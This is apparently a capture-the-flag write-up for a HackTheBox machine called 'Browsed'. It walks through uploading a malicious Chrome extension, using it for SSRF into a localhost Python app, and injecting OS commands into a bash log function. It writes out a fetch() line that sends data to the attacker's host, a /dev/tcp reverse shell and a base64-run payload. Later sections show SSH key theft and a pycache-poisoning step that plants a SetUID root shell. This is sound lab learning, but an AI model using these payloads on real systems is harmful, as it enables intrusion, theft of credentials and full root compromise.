---
tags:
  - Linux
  - HTTP
  - Insecure File Upload
  - JavaScript
  - SSRF
  - localhost service
  - OS-command injection
  - Sudoers
  - Pycache poisoning
---

... is a medium HTB machine which allows you to upload `Chrome Extensions`. Error messages during upload reveal another `VHost` which reveals the source code to an python-app on `localhost:5000`, which is vulnerable to OS-command injection! Using the java-script of the `Extensions`, a request can be made to that python web-app to execute commands. For privilege escalation, the `__pycache__` of a `sudoer` python-script is write-able, which leads to python executing custom byte-code as `root`.

### Reconnaissance
The tool `nmap` is used to do the initial reconnaissance of any target, as it very reliably sends packets to specific ports of the target to verify if they are open, closed, or filtered. The following command is used as a standard `nmap` scan:
```bash
sudo nmap -sCV $IP
```
<div class="annotate" markdown> (1) </div>

1. 
```bash
# sudo: optional, but makes the scan a bit faster and stealthier, as no TCP connect() is used.
# -sC (or --script=default): uses the default scripts of nmap. can quickly discover simple vulnerabilities, such as anonymous logins.
# -sV: further scans open ports to determine the actual service which is running on them, as an open port 80 does not directly imply a HTTP service.
```

the output of `nmap` tells us this:
```bash
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 02:c8:a4:ba:c5:ed:0b:13:ef:b7:e7:d7:ef:a2:9d:92 (ECDSA)
|_  256 53:ea:be:c7:07:05:9d:aa:9f:44:f8:bf:32:ed:5c:9a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Browsed
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
This output indicates a standard HTB `linux` box where a mis-configured `http` service leads to RCE or credential exposure which allows access to the `ssh` service.

As no domain seems to be in place, i simply visit `http://$IP` in `burpsuite's` browser to investigate the `http` service. In the header, i notice the domain `browsed.htb`, which gave me reason to believe that `browsed.htb` is the domain for this server, which is why edited the `/etc/hosts` file for local DNS name resolution without a public DNS server. The following command appends an entry to that file:
```bash
echo "$IP browsed.htb" | sudo tee --append /etc/hosts
```
<div class="annotate" markdown> (1) </div>

1. 
```bash
# echo "...": writes the specified string into STDOUT (terminal)
# | : redirect (pipe) the STDOUT of the left command into the STDIN of the right command
# sudo tee --append /etc/hosts: write the received STDIN into a file without overwriting it. requires sudo, as that file is critical to the system  
```

The site offers a home page with information about the possibilities of this service. It allows you to upload `Google Chrome Browser Extensions`, which are written in `javascript`. The `Samples` tab provides examples which can be downloaded and viewed. A `Upload Extensions` button redirects me to `upload.php`, where i can upload a `Chrome Extension` in `.zip` format for a developer to use.

I additionally use `ffuf` to employ forceful browsing to find possible hidden endpoints using this command:
```bash
ffuf -w /usr/share/dirb/wordlists/common.txt -u "http://browsed.htb/FUZZ.php"
```
<div class="annotate" markdown> (1) </div>

1. 
```bash
# -w: specify wordlist file
# -u: URL of the target. the FUZZ word gets replaced with each entry of the wordlist.
```

This has found the endpoint `elements.html` which seems to be a static site generated by `HTML5 UP` which displays how the elements will look on the web page.

Due to the domain name `browsed.htb`, i also decided to also do some `VHost` fuzzing using the `subdomains-top1million-110000.txt` from `SecLists/Discovery/DNS/`:
```bash
ffuf -w ./subdomains-top1million-110000.txt -H "Host: FUZZ.browsed.htb" -u http://browsed.htb -fs 6708 -mc all
```
<div class="annotate" markdown> (1) </div>

1. 
```bash
# -w: specify wordlist file
# -H: add specific header. Here, the header "FUZZ.browsed.htb" is chosen. the FUZZ word is replaced by each entry of the wordlist!
# -u: URL of the target
# -fs: filter by response size
# -mc: accept any response code
```

This has not found any additional `VHosts`.

### Initial Exploitation
After mapping all endpoints, i decided to investigate the `Chrome Extension` upload. I downloaded the sample `Extension` `"Timer"` and used `unzip` to view it's contents. It included files of the format `html`, `js` and `css`, with an additional `manifest.json` to keep those together. The main functionality is defined in the `popup.js`, where a timer is coded in `javascript`. The `html` file simply uses that `js` to display an popup window for that timer. 

I decided to upload this extension as it was to find out if the upload accepts it. After waiting for about 10 seconds, i receive a very long error message. I decided to filter for information which may reveal new endpoints so i did a `CTRL+F` and looked for `browsed` (to see if any endpoints regarding `browsed.htb` show up). And indeed, i find the new host-name `browsedinternals.htb`! I also add it to my  `/etc/hosts` file with the following command:
```bash
sudo sed -i "s/$IP browsed.htb/$IP browsed.htb browsedinternals.htb/" /etc/hosts
```
<div class="annotate" markdown> (1) </div>

1. 
```bash
# sudo: required, as we are editing /etc/hosts
# -i: edit the file in-place and overwrite it
# "s/old_word/new_word/": replaces each occurance of old_word with new_word
# /etc/hosts: file we want to edit
```

Visiting `http://browsedinternals.htb` shows me an instance of `Gitea` which exposes the source code to the application `MarkdownPreview` from the developer `larry`! I inspect the code of the `app.py` and it turns out that this is an `http` application which runs on port `5000` and is only accessible via `localhost`. It offers the following endpoints and functionalities:

- `GET /`: main landing page for the application
- `POST /submit`: receives `markdown` syntax from a `content` parameter, turns it into `HTML`, and stores it in a file.
- `GET /files`: lists all files ending in `html` from the upload directory.
- `GET /routines/<rid>`: executes `./routines.sh` with the parameter `<rid>`.
- `GET /view/<filename>`: returns the content of the specified `html` file.

The `GET /routines/<rid>` endpoint seems to be very interesting, as user-provided input is passed into a `bash` script without sanitation. The source code to the `routines.sh` is also available! I view it and look for `$1`, as that is the first command-line parameter passed into this `bash`-script (user-controlled!).

This script uses specific methods for cleaning temp files (if `RID=0`), creating backups (if `RID=1`), and so on. These methods are not as interesting as the `log_action()` method, which gets called if the `RID` is not `0,1,2 or 3`:
```bash
log_action() {
  echo "[$(date '+%Y-%m-%d %H:%M:%S')] $1" >> "$ROUTINE_LOG"
}
```
If the user provided input were to be something like `[$(whoami)]` (using the syntax of the provided command), it would then be executed!

#### Seeing if the application is running
I now only need to verify if this `http://localhost:5000` application is running on the target. To do so, i simply edit the `popup.js` file from the `timer` `Chrome Extension` to execute this following `js` code:
```js
fetch("http://localhost:5000/").then(response => response.text()).then(data => fetch("http://<my-IP>:1337/?content=" + btoa(data))).catch(err => fetch("http://<my-IP>:1337/?error=" + btoa(err)));
```
This `javascript` logic, when executed, fetches the resource located at `localhost:5000`, and then forwards the response to my `http` server (started with `python3 -m http.server 1337`). I create a new `zip` using the command:
```
zip -r test.zip manifest.json popup.html popup.js style.css
```
And then i await the response of the `developer` which is running my custom `Chrome Extension`. Sadly, this did not work.

This made me believe that my custom `js` code is not being executed at all, as the error messages seem to indicate that the browser extension is not running at all. I tried with all of the sample extensions (`fontify, replaceimages and timer`) but they all didn't work. After reviewing the `fontify` extension, i noticed this line in the `manifest.json`:
```json
"js": [
        "content.js"
      ],
```
This `"js"` tag was missing from the timer extension, which made me think that the `content.js` actually executes the `javascript` within the `content.js`. I added my `fetch` payload to the `content.js` and tried again. This time, i received a request! Although it is a `TypeError: Failed to fetch` message, which indicates that `CORS` is blocking the requests.

##### Injecting OS commands
I decided to simply try fetching the local resource with a ping command to verify that it exists:
```js
fetch("http://localhost:5000/routines/test[$(ping -c 3 <my-IP>)]")
```
When listening with `sudo tcpdump -i tun0 icmp`, i actually receive `ping` requests! This means that the injected OS command is being executed!

I encode a reverse shell initiator using this command:
```bash
echo "bash -c '/bin/bash -i >& /dev/tcp/<my-IP>/1337 0>&1'" | base64
```
And on the target i decode and execute it with this payload:
```js
fetch("http://localhost:5000/routines/test[$(echo <base64> | base64 -d | bash -i)]")
```
As usual, i start the listener using `nc`:
```bash
nc -lvnp 1337
```
<div class="annotate" markdown> (1) </div>

1. 
```bash
# -l: listen for inbound connects
# -v: verbose to get more info
# -n: numeric IP addresses, dont use DNS
# -p: specify listening port (1337)
```

And i receive a reverse shell from the user `larry`!

### Lateral Movement
The user `larry` has a home directory, which is why i assumed that i need his `ssh` access to the machine. `ssh` access is always better than a reverse shell, as it is fully interactive. It is always possible to upgrade the reverse shell with a [neat trick](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/), but `ssh` access to an actual account is always preferable.

I did not find any hard-coded credentials hidden in files, but i found `larrys` `.ssh` directory, where i could fetch his `id_ed25519` private key! I save it in a file called `larrys-key`, and change it's permissions to `chmod 400 larrys-key`, so that i can use it for `ssh` access to the machine:
```bash
ssh -i larrys-key larry@$IP
```

### Privilege Escalation
I try the three main privilege escalation vectors:

- `sudo -l`: mis-configured `sudoer` file
- `netstat -tulnp`: hidden services only accessible via localhost
- `id`: user belonging to a weird group

`sudo -l` reveals the following:
```bash
User larry may run the following commands on browsed:
    (root) NOPASSWD: /opt/extensiontool/extension_tool.py
```
As this is a non system-standard binary (also indicated by `/opt`), there is no public `GTFOBins` entry for this. After changing the directory to `/opt/extensiontool` and issuing a `ls -la`, i notice that the `__pycache__` directory has the permissions `777` (everyone can do everything). Reading the code of the `extension_tool.py`, it tells me that it is used to validate, bump (the version) and package browser extensions.

Googling `writable pycache` reveals the `Pycache poisoning privilege escalation` vector. The `__pycache__` directory is used by python to store compiled byte-code for the running python applications (and imported modules) so that the startup is a bit faster by skipping the `.py` file parsing.

Knowing this, i notice that the `extension_tool.py` imports and uses methods from the `extension_utils.py` file which is in the same directory. I create a copy of this extension `extension_utils.py` in `larry`'s home directory, and add a small addition to the `validate_manifest` method:
```python
# --- Manifest validate ---
def validate_manifest(path):
    subprocess.run("cp /bin/bash /home/larry/rootme; chmod u+s /home/larry/rootme", shell=True)
    # usual code ...
```
This creates the binary `rootme` in `larry`'s home directory, which is a copy of `bash`, only with the `SetUID` bit set (executing it results in a `root` bash)!

Now i can create my own `python` byte-code file using this command (using my custom `extension_utils.py`):
```bash
python3 -m py_compile extension_utils.py
```
The last step to finish this attack is to copy the first `16 bytes` of an original `.pyc` code into the first `16 bytes` of my custom `.pyc` file. This is because python will not accept the new byte-code if the first `16 bytes` do not match. I quickly create a valid `extension_utils.cpython-312.pyc` using this command:
```bash
sudo /opt/extensiontool/extension_tool.py --ext Fontify
```
And then i copy the `16 bytes` from the original `.pyc` file onto my custom `.pyc` file using this command:
```bash
dd if=/opt/extensiontool/__pycache__/extension_utils.cpython-312.pyc of=__pycache__/extension_utils.cpython-312.pyc bs=1 count=16 conv=notrunc
```
<div class="annotate" markdown> (1) </div>

1. 
```bash
# if: input file. here, the valid .pyc byte-code
# of: output file. here, my custom .pyc byte-code
# bs: block size = 1 byte
# count: copy 16 blocks (bytes)
# conv: do not truncate, simply replace
```

After this, i can copy the custom `.pyc` file into the `/opt/extensiontool/__pycache__` directory, and execute the `extension_tool.py` as `root` again. This causes python to load my custom byte-code and execute it, which results in the binary `/home/larry/rootme`, which i can use to gain `root` with the flag `-p` added!

### Summary

Below is a visualized summary of the exploitation steps used in this machine to gain RCE.

``` mermaid
graph LR
  A[HTTP<br>Service] -->|File<br>upload| B[Chrome<br>extension];
  B -->|XSS| C[localhost<br>application];

  D[localhost<br>application] -->|OS-Command<br>injection| E[OS-Command<br>execution];
  E -->|Read| F[Larry's<br>SSH-key]
  F-->|Use| G[SSH<br>Access];
```

The privilege escalation to the user `root` worked as follows:

``` mermaid
graph LR
  A[SSH<br>Access] -->|Sudo<br>permission| B[extension_tool.py];
  A[SSH<br>Access] -->|Write| C[__pycache__];
  B -->|pycache<br>poisoning| D[Command<br>execution<br>as root];
  C -->|pycache<br>poisoning| D[Command<br>execution<br>as root];
```